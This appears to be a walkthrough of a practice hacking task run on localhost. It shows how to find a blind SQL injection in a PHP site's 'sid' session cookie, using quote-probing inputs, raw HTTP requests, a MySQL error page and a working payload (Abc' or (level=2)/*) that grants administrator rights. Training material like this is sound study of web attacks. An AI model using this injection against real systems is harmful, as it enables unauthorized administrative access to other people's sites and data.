Try to investigate the system. Submit special characters such as apostrophes and quotation marks inside logins and passwords: Abc' , Abc' /* , Abc"/* , Abc') /* , Abc") /* , and so on.
The absence of a response to these values allows you to suppose that the processing of logins and passwords is invulnerable.
Test other data processed with the authorization script. It is known that the script processes the sid COOKIE parameter. Create a GET request and send the desired data as a COOKIE value of the sid parameter:
GET /zadachi/5/index.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 Cookie: sid=av'cdsa
The result of this request is the following document:
<br /> <b>Warning</b>: mysgl_fetch_object(): supplied argument is not a valid My SQL result resource in <b>x:\localhost\zadachi\login.inc.php</b> on line <b>28 </b><br /> <html><body> Authorization required <form method=POST> Login: <input type=text name=login><br> Password: <input type=password name=pass><br> <input type=submit> </form> </body> </html>
As you can see, incorrect values of the sid parameter cause an error.
Make another request:
GET /zadachi/5/index.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 Cookie: sid=a123abcd
The absence of an error message indicates that the sid value inserted into the SQL query is between apostrophes. In other words, the query looks as follows :
SELECT ... FROM regusers WHERE ... sid='$sid' ...
If this query returns a record corresponding to a certain user, the user is considered authorized with the session ID.
No results of the query are displayed. A remote user can judge the results of the query only because authorization was successful (or not). Nevertheless, it is sometimes possible to try any character for a value sought in a database.
In this task, you don't need to retrieve data from the database. It would be enough to find a value for the sid variable so that the resulting SQL query returns a record corresponding to any administrator.
In the terms of the task, you need to obtain a row of the table with level=2 .
It is easy to notice that the Abc' or (level=2)/* value of the sid variable generates the following query:
SELECT ... FROM regusers WHERE ... sid=' Abc' or (level=2)/*...
This would solve the task. So, test it and create a GET request:
GET /zadachi/5/index.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 Cookie: sid = Abc'%20or%20(level=2)/*
The result of this request is a page confirming the administrator's privileges.
In summary, to get the administrator's privileges in this system, you should submit the required value of the sid COOKIE parameter using your browser.
The task is solved .